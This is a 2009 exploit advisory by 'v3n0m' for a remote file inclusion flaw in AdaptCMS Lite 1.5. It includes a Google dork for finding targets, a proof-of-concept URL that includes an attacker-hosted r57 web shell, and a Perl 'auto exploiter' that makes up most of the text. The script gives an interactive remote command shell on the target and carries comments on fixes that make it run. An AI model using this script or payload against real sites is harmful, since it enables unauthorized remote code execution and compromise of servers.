
# Title : AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
# Published : 2009-11-29
# Author : v3n0m


)   )            )                     (   (         (   (    (       )     )  
  ( /(( /( (       ( /(  (       (    (     ) )) )      ) )) ) ) ) ( /(  ( /(  
  )())())) )    )()) )      )   )   (()/(()/(  (  (()/(()/((()/( )()) )()) 
 ((_)((_)(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )  /(_))(_))/(_))(_)|((_)  
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_) 
  / / _ (_)) __  / (_)_(_)(/ __(_)_(_) _ |   | __| _  |  |_ _|| | | |/ /  
  V / (_) || (_ | V / / _   | (__ / _  |   /| |) | _||   / |__ | | | .` | ' <   
  |_| ___/  ___| |_| /_/ _  ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_  


[+] AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
[-] Author	: v3n0m
[-] Contact	: v3n0m666[at]live[dot]com
[-] Blog	: http://v3n0m.blogdetik.com/
[-] Group	: YOGYACARDERLINK
[-] Site	: http://yogyacarderlink.web.id/
[-] Date	: November, 26-2009 [INDONESIA]

[!] Application	: AdaptCMS Lite
[!] Vendor	: www.insanevisions.com
[!] Version	: 1.5 (other versions may also be affected; only 1.5 is covered here)
[!] Download	: http://sourceforge.net/projects/adaptcms/files/
[!] License	: Free
[!] Vulnerable	: Remote File Inclusion
[!] Google Dork	: Copyright 2006-2009 Insane Visions


[o] Description

AdaptCMS is a PHP CMS intended to give complete control over a website,
to be easy to use, and to adapt to any type of site.
It offers advanced custom fields,
a simple but powerful template system, and more.


Vuln Code & PoC
***************
Vuln: include_once($sitepath."includes/rss/simplepie.inc");   (in plugins/rss_importer_functions.php)

      The include relies on register_globals = on, so that $sitepath can be supplied in the
      query string, and on allow_url_include / allow_url_fopen = on, so that an http:// value is
      fetched rather than read from disk (see the prerequisites in the exploiter header below).
      The trailing "??" in the PoC turns the appended "includes/rss/simplepie.inc" into part of
      the remote URL's query string, so the attacker-hosted PHP file (here an r57-style web shell)
      is what gets included and executed on the target.

PoC : http://server/plugins/rss_importer_functions.php?sitepath=http://localhost/r57.txt??


AdaptCMS Lite Auto Exploiter
****************************

#!/usr/bin/perl -w

##################################################################
# Created by v3n0m                                               #
# sHoutz: lingah,IdioT_InsidE,LeQhi,aRiee,z0mb13,m4rco,NaZmy,    #
#	  eidelweiss,JaLi-,Anak_Naga_,g0nz,mywisdom,setanmuda,   #
#	  yoga0400,ripper_maya,elv1n4,badkiddies,dhit_coxon,     #
#	  psychotic_girl,jo8928,r4f43l_world,angela zhang        #
#	  & All YOGYACARDERLINK Crew                             #
#                                                                #
# Target prerequisites (php.ini on the vulnerable host):         #
# - register_globals = on  ($sitepath taken from the request)    #
# - allow_url_include = on (so include() accepts http:// paths)  #
# - allow_url_fopen = on                                         #
##################################################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

# Clear the terminal so the banner / prompt starts on a clean screen.
# The command is chosen from $^O: "cls" on Windows, "clear" elsewhere.
# Returns whatever system() returns (the child's wait status).
sub clear {
    my $wipe = ($^O eq 'MSWin32') ? 'cls' : 'clear';
    return system($wipe);
}

# Wipe the screen once at start-up, before the options are parsed.
clear();

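# Print the tool banner and usage text, then exit with status 0.
# Called when -help is given or a required option (-u / -fuck) is
# missing, so it never returns to the caller.
#
# The text is a heredoc so the newlines and the double quotes in the
# usage line need no escaping (the listing had lost its backslashes,
# which turned every "\n" into a literal n and broke the quoting).
sub banner {
    clear();
    print <<"USAGE";
|---------------------------------------------|
|       AdaptCMS Lite RFI Auto Injector       |
| Created  : v3n0m                            |
| E-mail   : v3n0m666[at]live[dot]com         |
|                                             |
|                                             |
|                  www.yogyacarderlink.web.id |
|---------------------------------------------|

Usage:
 perl $0 -u "http://target/[path]/" -fuck "http://localhost/r57.txt??"

USAGE
    exit();
}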

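# Command-line options. The destinations must be references (\$var);
# without the backslash Getopt::Long has nowhere to store the values.
#   -u     base URL of the target install (the part before /plugins/)
#   -fuck  URL of the attacker-hosted PHP file to include; it should end
#          in "??" so the path the vulnerable include appends lands in
#          the query string of that URL rather than in its path
#   -help  show the usage banner
my ($help, $u, $fuck);
GetOptions(
    'help!'  => \$help,
    'u=s'    => \$u,
    'fuck=s' => \$fuck,
) or banner();    # unknown or malformed option: show usage (banner exits)

# Usage banner when asked for, or when either required option is absent.
banner() if $help;
banner() unless $u;
banner() unless $fuck;

# Strip a trailing newline if one slipped into the values (normally a no-op
# for command-line arguments).
chomp($u);
chomp($fuck);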

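# Interactive "shell" loop. Every line typed at the prompt is sent as the
# cmd parameter of one GET request to the vulnerable include:
#   $u/plugins/rss_importer_functions.php?sitepath=$fuck?&act=cmd&cmd=<line>&d=/&submit=1&cmd_txt=1
# ($fuck is expected to end in "??", which is why the query can simply be
# appended) and the command output is scraped from the read-only
# <textarea> that the included r57-style page renders.
#
# Reads $u and $fuck set by the option parsing above. Exits 0 on
# "exit"/"quit" or EOF on stdin, and 1 on the first non-2xx response.
#
# One UserAgent serves the whole session; rebuilding it on every
# iteration, as the original did, gained nothing.
my $ua = LWP::UserAgent->new;

while (1) {
    print "[shell]:~\$ ";
    my $cmd = <STDIN>;
    last unless defined $cmd;    # EOF (Ctrl-D): stop instead of looping on undef
    chomp($cmd);

    exit 0 if $cmd eq "exit" || $cmd eq "quit";

    # NOTE: $cmd is placed in the URL without URL-encoding, exactly as the
    # original did; a command containing '&' or '#' will be cut at that
    # character by URL parsing rather than reach the remote shell intact.
    my $query = "?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
    my $url   = $u . "/plugins/rss_importer_functions.php?sitepath=" . $fuck . $query;

    my $res = $ua->request(HTTP::Request->new(GET => $url));

    unless ($res->is_success) {
        print "Exploiting failed !!\n";
        exit(1);
    }

    # Extract the command output from the read-only textarea, if present.
    # Braces as delimiters avoid escaping the "/" in </textarea> (the
    # listing's unescaped "/" inside m/.../ was a syntax error). /x keeps
    # the space after "readonly>" insignificant, as in the original flags.
    if ($res->content =~ m{readonly> (.*?)</textarea>}msix) {
        print $1, "\n";
    }
}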